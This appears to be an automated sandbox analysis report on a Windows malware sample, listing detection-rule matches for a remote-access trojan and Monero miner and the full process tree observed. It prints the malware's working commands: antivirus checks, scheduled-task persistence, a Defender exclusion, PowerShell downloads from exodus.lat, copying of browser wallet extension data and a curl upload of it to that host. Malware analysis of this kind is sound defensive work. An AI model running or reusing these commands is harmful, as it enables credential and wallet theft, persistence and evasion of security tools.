                                  Source: Process Memory Space: RegAsm.exe PID: 6884, type: MEMORYSTRMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                                  Source: C:\Users\user\AppData\Local\asm\mi.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                  Source: C:\Users\user\AppData\Local\asm\mi.exe, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                                  Source: C:\Users\user\AppData\Local\asm\mi.exe, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                                  Source: smartscreen.exe.22.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: COMSurrogate.exe.38.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: 22.2.RegAsm.exe.61d0000.10.raw.unpack, ArrayUtils.csCryptographic APIs: 'TransformBlock'
                                  Source: 22.2.RegAsm.exe.61d0000.10.raw.unpack, ArrayUtils.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                                  Source: 22.2.RegAsm.exe.5a40000.5.raw.unpack, CursorStreamCodec.csTask registration methods: 'CreateModifierTask'
                                  Source: smartscreen.exe.22.dr, ClipboardMonitor.csBase64 encoded string: 'GAKQVYAYGOJEN2XJIYUYG24OGN64RXV2KN3UW3XUR6KUMENJ6YDM5TTG'
                                  Source: 22.2.RegAsm.exe.5130000.4.raw.unpack, KeyDatabase.csBase64 encoded string: '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', 'PetZ5Lw
                                  Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@93/67@0/4
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0069A6AD GetLastError,FormatMessageW,18_2_0069A6AD
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00688DE9 AdjustTokenPrivileges,CloseHandle,18_2_00688DE9
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00689399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,18_2_00689399
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00694148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,18_2_00694148
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0069443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,18_2_0069443D
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comFile created: C:\Users\user\AppData\Local\CreativePixel TechJump to behavior
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2128:120:WilError_03
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeMutant created: NULL
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2976:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6628:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2784:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5832:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_03
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\7a9c0f279c464958aebbd585f20f1cf2
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeFile created: C:\Users\user\AppData\Local\Temp\nsf18B.tmpJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\download.bat" "
                                  Source: DM6vAAgoCw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                  Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * FROM WIN32_Processor
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeFile read: C:\Users\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: DM6vAAgoCw.exeReversingLabs: Detection: 31%
                                  Source: DM6vAAgoCw.exeVirustotal: Detection: 30%
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeFile read: C:\Users\user\Desktop\DM6vAAgoCw.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\DM6vAAgoCw.exe "C:\Users\user\Desktop\DM6vAAgoCw.exe"
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 491505
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\491505\Dr.com Dr.com B
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST
                                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js"
                                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr" "C:\Users\user\AppData\Local\CreativePixel Tech\E"
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comProcess created: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\download.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net session
                                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 session
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\checkmiexe.bat" "
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runsteal.bat" "
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\smartscreen.exe "C:\Users\user\AppData\Local\Temp\smartscreen.exe"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net session
                                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 session
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c "C:\Users\user\AppData\Local\Temp\downloaded_script.bat"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy /E /I "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy /E /I "C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Edge\"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\asm\COMSurrogate.exe "C:\Users\user\AppData\Local\asm\COMSurrogate.exe"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s https://api.ipify.org
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip'"
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\smartscreen.exe "C:\Users\user\AppData\Local\Temp\smartscreen.exe"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php"
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\asm\COMSurrogate.exe "C:\Users\user\AppData\Local\asm\COMSurrogate.exe"
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\smartscreen.exe "C:\Users\user\AppData\Local\Temp\smartscreen.exe"
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\asm\COMSurrogate.exe "C:\Users\user\AppData\Local\asm\COMSurrogate.exe"
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmdJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 491505Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue BJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\491505\Dr.com Dr.com BJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHESTJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHESTJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comProcess created: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHESTJump to behavior
                                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr" "C:\Users\user\AppData\Local\CreativePixel Tech\E"Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\download.bat" "Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\checkmiexe.bat" "Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runsteal.bat" "Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\smartscreen.exe "C:\Users\user\AppData\Local\Temp\smartscreen.exe" Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net session
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
                                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 session
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net session
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c "C:\Users\user\AppData\Local\Temp\downloaded_script.bat"
                                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 session
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy /E /I "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy /E /I "C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Edge\"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
